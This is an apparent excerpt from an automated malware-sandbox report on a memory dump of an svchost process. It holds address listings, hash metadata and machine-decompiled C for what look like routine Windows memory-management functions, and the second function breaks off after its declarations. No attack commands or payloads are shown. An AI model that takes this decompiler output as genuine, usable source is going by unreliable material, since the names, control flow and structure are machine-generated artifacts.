                                          0x03a3d8ce
                                          0x03a3d8d4
                                          0x03a3d8dd
                                          0x03a3d8e0
                                          0x03a3d68c
                                          0x03a3d691
                                          0x03a3d69d
                                          0x03a3d6a2
                                          0x03a3d6a7
                                          0x03a3d6b0
                                          0x03a3d6b5
                                          0x03a3d6e0
                                          0x03a3d6b7
                                          0x03a3d6b7
                                          0x03a3d6b9
                                          0x03a3d6b9
                                          0x03a3d6bb
                                          0x03a3d6bd
                                          0x03a3d6ce
                                          0x03a3d6d0
                                          0x03a3d6d2
                                          0x03a8b363
                                          0x03a8b365
                                          0x00000000
                                          0x03a8b36b
                                          0x00000000
                                          0x03a8b36b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a3d6bf
                                          0x03a3d6bf
                                          0x03a3d6e5
                                          0x03a3d6e7
                                          0x03a3d6e9
                                          0x03a3d6ec
                                          0x03a3d6ec
                                          0x03a3d6ef
                                          0x03a3d6f5
                                          0x03a3d6f9
                                          0x03a3d6fb
                                          0x03a3d6fd
                                          0x03a3d701
                                          0x03a3d703
                                          0x03a3d70a
                                          0x03a3d70a
                                          0x03a3d701
                                          0x03a3d710
                                          0x03a3d710
                                          0x03a3d6c1
                                          0x03a3d6c1
                                          0x03a3d6c6
                                          0x03a8b36d
                                          0x03a8b36f
                                          0x00000000
                                          0x03a8b375
                                          0x03a8b375
                                          0x03a8b375
                                          0x00000000
                                          0x03a8b375
                                          0x00000000
                                          0x03a3d6cc
                                          0x03a3d6d8
                                          0x03a3d6d8
                                          0x03a3d6d8
                                          0x00000000
                                          0x03a3d6c6
                                          0x03a3d6bf
                                          0x00000000
                                          0x03a3d6da
                                          0x03a3d6da
                                          0x03a3d716
                                          0x03a3d71b
                                          0x03a3d720
                                          0x03a3d726
                                          0x03a3d726
                                          0x03a3d72d
                                          0x00000000
                                          0x03a3d733
                                          0x03a3d739
                                          0x03a3d742
                                          0x03a3d750
                                          0x03a3d758
                                          0x03a3d764
                                          0x03a3d776
                                          0x03a3d77a
                                          0x03a3d783
                                          0x03a3d928
                                          0x03a3d92c
                                          0x03a3d93d
                                          0x03a3d944
                                          0x03a3d94f
                                          0x03a3d954
                                          0x03a3d956
                                          0x03a3d95f
                                          0x03a3d961
                                          0x03a3d973
                                          0x03a3d973
                                          0x03a3d956
                                          0x03a3d944
                                          0x03a3d92c
                                          0x03a3d78b
                                          0x03a8b394
                                          0x03a3d791
                                          0x03a3d798
                                          0x03a8b3a3
                                          0x03a8b3bb
                                          0x03a8b3bb
                                          0x03a3d7a5
                                          0x03a3d866
                                          0x03a3d870
                                          0x03a3d892
                                          0x03a3d898
                                          0x03a3d89e
                                          0x03a3d8a0
                                          0x03a3d8a6
                                          0x03a3d8ac
                                          0x03a3d8ae
                                          0x03a3d8b4
                                          0x03a3d8b4
                                          0x03a3d8ae
                                          0x03a3d7a5
                                          0x03a3d78b
                                          0x03a3d7b1
                                          0x03a8b3c5
                                          0x03a8b3c5
                                          0x03a3d7c3
                                          0x03a3d7ca
                                          0x03a3d7e5
                                          0x03a3d7eb
                                          0x03a3d8eb
                                          0x03a3d8ed
                                          0x00000000
                                          0x03a3d8f3
                                          0x03a3d8f3
                                          0x03a3d8f3
                                          0x00000000
                                          0x03a3d8ed
                                          0x03a3d7cc
                                          0x03a3d7cc
                                          0x03a3d7d2
                                          0x00000000
                                          0x03a3d7d4
                                          0x03a3d7d4
                                          0x03a3d7d7
                                          0x03a3d7df
                                          0x03a8b3d4
                                          0x03a8b3d9
                                          0x03a8b3dc
                                          0x03a8b3dc
                                          0x03a8b3df
                                          0x03a8b3e2
                                          0x03a8b468
                                          0x03a8b46d
                                          0x03a8b46f
                                          0x03a8b46f
                                          0x03a8b475
                                          0x03a3d8f8
                                          0x03a3d8f9
                                          0x03a3d8fd
                                          0x03a8b3e8
                                          0x03a8b3e8
                                          0x03a8b3eb
                                          0x03a8b3ed
                                          0x00000000
                                          0x03a8b3ef
                                          0x03a8b3ef
                                          0x03a8b3f1
                                          0x03a8b3f4
                                          0x03a8b3fe
                                          0x03a8b404
                                          0x03a8b409
                                          0x03a8b40e
                                          0x03a8b410
                                          0x03a8b410
                                          0x03a8b414
                                          0x03a8b414
                                          0x03a8b41b
                                          0x03a8b420
                                          0x03a8b423
                                          0x03a8b425
                                          0x03a8b427
                                          0x03a8b42a
                                          0x03a8b42d
                                          0x03a8b42d
                                          0x03a8b42a
                                          0x03a8b432
                                          0x03a8b436
                                          0x03a8b438
                                          0x03a8b43b
                                          0x03a8b43b
                                          0x03a8b449
                                          0x03a8b44e
                                          0x03a8b454
                                          0x03a8b458
                                          0x03a8b458
                                          0x03a8b45d
                                          0x00000000
                                          0x03a8b45d
                                          0x03a8b3ed
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a3d7df
                                          0x03a3d7d2
                                          0x03a3d7ca
                                          0x03a8b37c
                                          0x03a8b37e
                                          0x03a8b385
                                          0x03a8b38a
                                          0x00000000
                                          0x03a8b38a
                                          0x03a3d742
                                          0x03a3d7f1
                                          0x03a3d7f8
                                          0x03a8b49b
                                          0x03a8b49b
                                          0x03a3d800
                                          0x03a3d837
                                          0x03a3d843
                                          0x03a3d845
                                          0x03a3d847
                                          0x03a3d84a
                                          0x03a3d84b
                                          0x03a3d84e
                                          0x03a3d857
                                          0x03a3d818
                                          0x03a3d824
                                          0x03a3d831
                                          0x03a8b4a5
                                          0x03a8b4ab
                                          0x03a8b4b3
                                          0x03a8b4b8
                                          0x03a8b4bb
                                          0x00000000
                                          0x03a8b4c1
                                          0x03a8b4c1
                                          0x03a8b4c8
                                          0x00000000
                                          0x03a8b4ce
                                          0x03a8b4d4
                                          0x03a8b4e1
                                          0x03a8b4e3
                                          0x03a8b4e5
                                          0x00000000
                                          0x03a8b4eb
                                          0x03a8b4f0
                                          0x03a8b4f2
                                          0x03a3dac9
                                          0x03a3dacc
                                          0x03a3dacf
                                          0x03a3dad1
                                          0x03a3dd78
                                          0x03a3dd78
                                          0x03a3dcf2
                                          0x00000000
                                          0x03a3dad7
                                          0x03a3dad9
                                          0x03a3dadb
                                          0x00000000
                                          0x00000000
                                          0x03a3dae1
                                          0x03a3dae1
                                          0x03a3dae4
                                          0x03a3dae6
                                          0x03a8b4f9
                                          0x03a8b4f9
                                          0x03a8b500
                                          0x03a3daec
                                          0x03a3daec
                                          0x03a3daf5
                                          0x03a3daf8
                                          0x03a3dafb
                                          0x03a3db03
                                          0x03a3db11
                                          0x03a3db16
                                          0x03a3db19
                                          0x03a3db1b
                                          0x03a8b52c
                                          0x03a8b531
                                          0x03a8b534
                                          0x03a3db21
                                          0x03a3db21
                                          0x03a3db24
                                          0x03a3dcd9
                                          0x03a3dce2
                                          0x03a3dce5
                                          0x03a3dd6a
                                          0x03a3dd6d
                                          0x00000000
                                          0x03a3dd73
                                          0x03a8b51a
                                          0x03a8b51c
                                          0x03a8b51f
                                          0x03a8b524
                                          0x00000000
                                          0x03a8b524
                                          0x03a3dce7
                                          0x03a3dce7
                                          0x03a3dce7
                                          0x00000000
                                          0x03a3dce7
                                          0x00000000
                                          0x03a3db2a
                                          0x03a3db2c
                                          0x03a3db31
                                          0x03a3db33
                                          0x03a3db36
                                          0x03a3db39
                                          0x03a3db3b
                                          0x03a3db66
                                          0x03a3db66
                                          0x03a3db3d
                                          0x03a3db3d
                                          0x03a3db3e
                                          0x03a3db46
                                          0x03a3db47
                                          0x03a3db49
                                          0x03a3db4c
                                          0x03a3db53
                                          0x03a3db55
                                          0x03a3db58
                                          0x03a3db5a
                                          0x03a8b50a
                                          0x03a8b50f
                                          0x03a8b512
                                          0x03a3db60
                                          0x03a3db60
                                          0x03a3db63
                                          0x03a3db63
                                          0x00000000
                                          0x03a3db63
                                          0x03a3db5a
                                          0x03a3db3b
                                          0x03a3db24
                                          0x03a3db69
                                          0x03a3db69
                                          0x03a3db6c
                                          0x03a3db6f
                                          0x03a3db74
                                          0x03a8b557
                                          0x03a8b557
                                          0x03a8b55e
                                          0x03a3db7a
                                          0x03a3db7c
                                          0x03a3db7f
                                          0x03a3db82
                                          0x03a3db85
                                          0x00000000
                                          0x03a3db8b
                                          0x03a3db8b
                                          0x03a3db8d
                                          0x03a3db9b
                                          0x03a3db9b
                                          0x03a3db9d
                                          0x03a3dba0
                                          0x03a3dba2
                                          0x03a3dba4
                                          0x03a3dba7
                                          0x03a3dba9
                                          0x03a3dbae
                                          0x03a3dbae
                                          0x03a3dbb1
                                          0x03a3dbb4
                                          0x03a3dbb4
                                          0x03a3dbb7
                                          0x03a3dbba
                                          0x03a3dcd2
                                          0x03a3dcd4
                                          0x00000000
                                          0x03a3dbc0
                                          0x03a3dbc0
                                          0x03a3dbd2
                                          0x03a3dbd7
                                          0x03a3dbda
                                          0x03a3dbdd
                                          0x03a3dbdf
                                          0x00000000
                                          0x03a3dbe5
                                          0x03a3dbe5
                                          0x03a3dbee
                                          0x03a3dbf1
                                          0x03a8b541
                                          0x03a8b544
                                          0x00000000
                                          0x03a8b546
                                          0x03a8b546
                                          0x00000000
                                          0x03a8b546
                                          0x03a3dbf7
                                          0x03a3dbf7
                                          0x03a3dbfd
                                          0x03a3dbfd
                                          0x03a3dbff
                                          0x03a3dc0b
                                          0x03a3dc15
                                          0x03a3dc1b
                                          0x03a3dc1d
                                          0x03a3dc21
                                          0x03a3dc21
                                          0x03a3dc23
                                          0x03a3dc23
                                          0x03a3dc26
                                          0x03a3dc29
                                          0x03a3dc2b
                                          0x00000000
                                          0x00000000
                                          0x03a3dc31
                                          0x03a3dc34
                                          0x03a3dc36
                                          0x03a3dcbf
                                          0x03a3dcbf
                                          0x03a3dcc2
                                          0x00000000
                                          0x03a3dc3c
                                          0x03a3dc41
                                          0x03a3dc43
                                          0x00000000
                                          0x03a3dc45
                                          0x03a3dc45
                                          0x03a3dc47
                                          0x00000000
                                          0x03a3dc4d
                                          0x03a3dc4d
                                          0x03a3dc50
                                          0x03a3dc52
                                          0x03a3dc55
                                          0x03a3dcfa
                                          0x03a3dcfe
                                          0x03a3dd08
                                          0x03a3dd0a
                                          0x03a3dd0c
                                          0x00000000
                                          0x03a3dd12
                                          0x03a3dd15
                                          0x03a3dd2d
                                          0x03a3dd2f
                                          0x03a3dd32
                                          0x03a3dd35
                                          0x00000000
                                          0x03a3dd35
                                          0x03a3dc5b
                                          0x03a3dc5b
                                          0x03a3dc5e
                                          0x03a3dc61
                                          0x03a3dc64
                                          0x03a3dc67
                                          0x03a3dc67
                                          0x03a3dc6a
                                          0x03a3dc6c
                                          0x03a3dc8e
                                          0x03a3dc8e
                                          0x03a3dc91
                                          0x03a3dc93
                                          0x03a3dcce
                                          0x03a3dcce
                                          0x03a3dc95
                                          0x03a3dc9c
                                          0x03a3dc6e
                                          0x03a3dc72
                                          0x03a3dc75
                                          0x03a3dc77
                                          0x03a3dc79
                                          0x03a8b551
                                          0x03a8b551
                                          0x00000000
                                          0x03a3dc7f
                                          0x03a3dc7f
                                          0x03a3dc81
                                          0x00000000
                                          0x03a3dc83
                                          0x03a3dc86
                                          0x03a3dc88
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a3dc88
                                          0x03a3dc81
                                          0x03a3dc79
                                          0x03a3dc6c
                                          0x03a3dc55
                                          0x03a3dc47
                                          0x03a3dc43
                                          0x00000000
                                          0x03a3dc36
                                          0x03a3dc23
                                          0x00000000
                                          0x03a3dbff
                                          0x03a3dbf1
                                          0x03a3dbdf
                                          0x03a3db8f
                                          0x03a3db92
                                          0x03a3db95
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a3db95
                                          0x03a3db8d
                                          0x03a3db85
                                          0x03a3db74
                                          0x03a3dc9f
                                          0x03a3dca2
                                          0x03a3dcb0
                                          0x03a3dcb0
                                          0x03a3dad1
                                          0x03a8b4e5
                                          0x03a8b4c8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a3d831
                                          0x00000000
                                          0x03a3d800
                                          0x03a8b47f
                                          0x03a8b485
                                          0x00000000
                                          0x03a8b485
                                          0x03a3d665
                                          0x03a3d652
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c7551d730b0312878ab4159cb8ae20e11ff59b68bc0fb6e9a5d54b4b98af0bdf
                                          • Instruction ID: ab0e48d0aeef6bcb3a08b4e60fc8b3e42ba4e6732515f21576754c13bcaec8bf
                                          • Opcode Fuzzy Hash: c7551d730b0312878ab4159cb8ae20e11ff59b68bc0fb6e9a5d54b4b98af0bdf
                                          • Instruction Fuzzy Hash: B1E1B174A00359CFDB24EF14C984B69B7B6BF86304F0801EFE8199B690D774A985CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A3849B Relevance: .3, Instructions: 290COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E03A3849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x3aff9c0);
				E03A7D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x3b17b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E03A3CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E03A42280( *[fs:0x30], 0x3b18550);
						_t139 =  *0x3b17b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E03A5F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E03A3FFB0(_t193, _t235, 0x3b18550);
								L5:
								return E03A7D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E03A21C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x3b17b9c; // 0x0
							_t235 = L03A44620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x3b17b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E03A5A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E03A3FFB0(_t193, _t235, 0x3b18550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L03A477F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L03A477F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x3b17b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x3b17b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E03A637C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x3b17b9c; // 0x0
									_t214 = L03A44620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E03A637F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x3b17b10 =  *0x3b17b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x3b17b04 =  *0x3b17b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L03A477F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L03A477F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x3b17b08 =  *0x3b17b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E03A657C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E03A6F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L03A477F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E03A5A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L03A477F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E03A696C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                          0x03a3849b
                                          0x03a3849b
                                          0x03a3849b
                                          0x03a3849b
                                          0x03a3849d
                                          0x03a384a2
                                          0x03a384a7
                                          0x03a384b1
                                          0x03a384d8
                                          0x00000000
                                          0x03a384b3
                                          0x03a384c4
                                          0x03a384c9
                                          0x03a384cd
                                          0x03a384cf
                                          0x03a384cf
                                          0x03a384d6
                                          0x03a384e6
                                          0x03a384e9
                                          0x03a384ec
                                          0x03a384ef
                                          0x03a384f2
                                          0x03a384f4
                                          0x03a384fc
                                          0x03a38501
                                          0x03a38506
                                          0x03a38509
                                          0x03a386e0
                                          0x03a386e5
                                          0x03a386e8
                                          0x03a386ed
                                          0x03a386f0
                                          0x03a386f2
                                          0x03a89afd
                                          0x03a89b02
                                          0x03a384da
                                          0x03a384df
                                          0x03a384df
                                          0x03a386fa
                                          0x03a386fd
                                          0x03a386fe
                                          0x03a38701
                                          0x03a38706
                                          0x03a38709
                                          0x03a3870b
                                          0x00000000
                                          0x00000000
                                          0x03a38711
                                          0x03a38725
                                          0x03a38727
                                          0x03a3872a
                                          0x03a3872c
                                          0x03a89af0
                                          0x03a89af5
                                          0x03a38732
                                          0x03a38732
                                          0x03a38732
                                          0x03a38735
                                          0x03a38737
                                          0x03a38515
                                          0x03a38515
                                          0x03a38518
                                          0x03a3851d
                                          0x03a38523
                                          0x03a38527
                                          0x03a3852b
                                          0x03a38537
                                          0x03a38539
                                          0x03a3853c
                                          0x03a3853e
                                          0x03a3868c
                                          0x03a38691
                                          0x03a38699
                                          0x03a3869b
                                          0x03a38744
                                          0x03a38748
                                          0x03a386a1
                                          0x03a386a1
                                          0x03a386a1
                                          0x03a386a4
                                          0x03a386a8
                                          0x03a89bdf
                                          0x03a89bdf
                                          0x03a386ae
                                          0x03a386b0
                                          0x00000000
                                          0x03a386b6
                                          0x00000000
                                          0x03a89be9
                                          0x03a386b0
                                          0x03a38544
                                          0x03a3854a
                                          0x03a3854d
                                          0x03a38551
                                          0x03a3876e
                                          0x03a38778
                                          0x03a3877b
                                          0x03a38780
                                          0x03a38557
                                          0x03a38557
                                          0x03a3855d
                                          0x03a3855d
                                          0x03a3856b
                                          0x03a3856e
                                          0x03a38570
                                          0x03a38573
                                          0x03a38576
                                          0x03a38576
                                          0x03a38579
                                          0x03a3857b
                                          0x00000000
                                          0x00000000
                                          0x03a38581
                                          0x03a385a0
                                          0x03a385a2
                                          0x03a385a5
                                          0x03a385a7
                                          0x03a89b1b
                                          0x03a89b1b
                                          0x03a3862e
                                          0x03a3862e
                                          0x03a38631
                                          0x03a38631
                                          0x03a38634
                                          0x03a38636
                                          0x03a38669
                                          0x03a38669
                                          0x03a3866b
                                          0x03a89bbf
                                          0x03a89bc4
                                          0x03a89bc8
                                          0x03a89bce
                                          0x03a89bce
                                          0x03a38671
                                          0x03a38671
                                          0x03a38674
                                          0x03a38676
                                          0x03a89bae
                                          0x03a89bae
                                          0x03a38676
                                          0x03a3867c
                                          0x03a3867e
                                          0x03a38688
                                          0x03a38688
                                          0x00000000
                                          0x03a3867e
                                          0x03a38638
                                          0x03a38638
                                          0x03a3863b
                                          0x03a3863e
                                          0x03a3863f
                                          0x03a38642
                                          0x03a38645
                                          0x03a38648
                                          0x03a3864d
                                          0x03a89b69
                                          0x03a89b6e
                                          0x03a89b7b
                                          0x03a89b81
                                          0x03a89b85
                                          0x03a89b89
                                          0x03a89ba7
                                          0x03a89b8b
                                          0x03a89b91
                                          0x03a89b9a
                                          0x03a89b9f
                                          0x03a89b9f
                                          0x03a38788
                                          0x03a3878d
                                          0x03a38763
                                          0x03a38763
                                          0x03a38766
                                          0x00000000
                                          0x03a38766
                                          0x03a89b70
                                          0x00000000
                                          0x03a89b70
                                          0x03a38656
                                          0x03a3865a
                                          0x03a3865c
                                          0x03a38752
                                          0x03a38756
                                          0x00000000
                                          0x00000000
                                          0x03a3875e
                                          0x00000000
                                          0x03a3875e
                                          0x03a38662
                                          0x03a38662
                                          0x03a38662
                                          0x03a38666
                                          0x00000000
                                          0x03a38666
                                          0x03a385b7
                                          0x03a385b9
                                          0x03a385bc
                                          0x03a385bf
                                          0x03a385cc
                                          0x03a385d1
                                          0x03a385d4
                                          0x03a385db
                                          0x03a385de
                                          0x03a385e0
                                          0x03a89b5f
                                          0x00000000
                                          0x03a89b5f
                                          0x03a385e6
                                          0x03a385ea
                                          0x03a386c3
                                          0x03a386c5
                                          0x03a386c8
                                          0x03a386ca
                                          0x03a89b16
                                          0x00000000
                                          0x03a89b16
                                          0x03a386d6
                                          0x03a385f6
                                          0x03a385f6
                                          0x03a385f9
                                          0x03a38602
                                          0x03a38606
                                          0x03a3860a
                                          0x03a3860b
                                          0x03a3860e
                                          0x03a38611
                                          0x00000000
                                          0x03a38611
                                          0x03a385f3
                                          0x00000000
                                          0x03a385f3
                                          0x03a38619
                                          0x03a3861e
                                          0x03a3861e
                                          0x03a38621
                                          0x03a38622
                                          0x03a38623
                                          0x03a38625
                                          0x03a3862c
                                          0x00000000
                                          0x03a3873d
                                          0x00000000
                                          0x03a3873d
                                          0x03a38737
                                          0x03a3850f
                                          0x03a38512
                                          0x00000000
                                          0x03a38512
                                          0x00000000
                                          0x03a384d6

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 63d063aca35b3f88b4bf5c47baa58827ef9f25cdc27df017505a5362e539e8da
                                          • Instruction ID: fe6d7c85e2cc412c714626255e32a1c40ffb5b2e0844adee117fcfb2af6b050d
                                          • Opcode Fuzzy Hash: 63d063aca35b3f88b4bf5c47baa58827ef9f25cdc27df017505a5362e539e8da
                                          • Instruction Fuzzy Hash: B1B14874E00309DFCB14DFA8CA84AAEBBB9BF4A304F14412EF415AB755DB78A945CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A5513A Relevance: .3, Instructions: 258COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E03A5513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

